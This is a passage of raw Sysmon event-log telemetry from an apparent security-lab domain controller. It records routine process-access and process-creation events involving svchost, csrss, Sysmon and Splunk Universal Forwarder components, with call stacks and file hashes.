13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4497-6000-1A01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4497-6000-1A01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.677{08A6967A-4497-6000-1A01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4497-6000-1901-000000009A01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4497-6000-1901-000000009A01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.129{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4497-6000-1901-000000009A01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.130{08A6967A-4497-6000-1901-000000009A01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4498-6000-1B01-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:16.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 